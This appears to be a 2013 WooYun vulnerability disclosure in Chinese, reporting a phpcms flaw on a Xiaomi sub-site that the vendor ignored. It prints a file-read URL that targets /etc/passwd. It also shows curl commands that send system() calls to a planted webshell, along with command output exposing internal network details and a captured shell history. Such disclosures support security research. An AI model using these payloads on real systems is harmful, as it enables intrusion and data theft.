当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2013-041385

漏洞标题:一次小米未完成的内网渗透测试(仅测试可能性)

相关厂商:小米科技

漏洞作者: 路人甲

提交时间:2013-10-29 17:15

修复时间:2013-10-30 10:36

公开时间:2013-10-30 10:36

漏洞类型:命令执行

危害等级:高

自评Rank:15

漏洞状态:漏洞已经通知厂商但是厂商忽略漏洞

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2013-10-29: 细节已通知厂商并且等待厂商处理中
2013-10-30: 厂商已经主动忽略漏洞,细节向公众公开

简要描述:

典型的一个分站业务导致的问题,本来想证明下业务架构和运维方面的问题,结果近期比较忙结果业务下线了,悲催!
PS: 猜猜我是谁

详细说明:

www.xiaomi.cn使用phpcms搭建

http://www.xiaomi.cn/api.php?op=ajax_domain&url=/etc/passwd


0.jpg


1 (2).jpg


1.jpg


3.jpg


4.jpg


5.jpg

漏洞证明:

curl http://www.xiaomi.cn/phpsso_server/1.php -d 'c=system($_REQUEST[d]);&d=id'
uid=10000(work) gid=10000(work) groups=10000(work)


curl http://www.xiaomi.cn/phpsso_server/1.php -d 'c=system($_REQUEST[d]);&d=/sbin/ifconfig'
eth0 Link encap:Ethernet HWaddr 00:25:90:97:E5:14
inet addr:10.21.1.107 Bcast:10.21.1.255 Mask:255.255.255.0
UP BROADCAST RUNNING MULTICAST MTU:1500 Metric:1
RX packets:1903443069 errors:0 dropped:0 overruns:0 frame:0
TX packets:2863354900 errors:0 dropped:0 overruns:0 carrier:0
collisions:0 txqueuelen:1000
RX bytes:987513424371 (919.6 GiB) TX bytes:2483428852473 (2.2 TiB)
Memory:df980000-dfa00000


#1377263539
ls
#1377263549
vi /home/work/app/php/etc/php.ini
#1377263569
/home/work/app/php/run.sh restar
#1377263571
/home/work/app/php/run.sh restart
#1377263708
tail /home/work/logs/php/php_error.log
#1377263752
vi /home/work/app/php/etc/php.ini
#1377263862
/home/work/app/php/run.sh restart
#1377264188
vi /home/work/app/php/etc/php.ini
#1377264319
/home/work/app/php/run.sh restart
#1377264540
vi /home/work/www/api.xiaomi.cn/config/database.php
#1377265088
tail /home/work/logs/php/php_error.log
#1377265097
tail -100 /home/work/logs/php/php_error.log
#1377265318
curl -I -H "host:api.xiaomi.cn" http://127.0.0.1:8000/cms/category/getcategory/cat_id/6/num/10
#1377265328
curl -i -H "host:api.xiaomi.cn" http://127.0.0.1:8000/cms/category/getcategory/cat_id/6/num/10
#1377265340
ls
#1377265342
cd www/
#1377265342

修复方案:

应用架构有问题(第三方的可有监控?)
网络架构有问题(网络边界是否有隔离?)
系统架构有问题(是否将运维和线上业务账号分离?)

版权声明:转载请注明来源 路人甲@乌云


漏洞回应

厂商回应:

危害等级:无影响厂商忽略

忽略时间:2013-10-30 10:36

厂商回复:

现在的“白帽子”是越来越看不懂了,以前一定是会报“小米网phpcms任意文件读取漏洞”。

最新状态:

暂无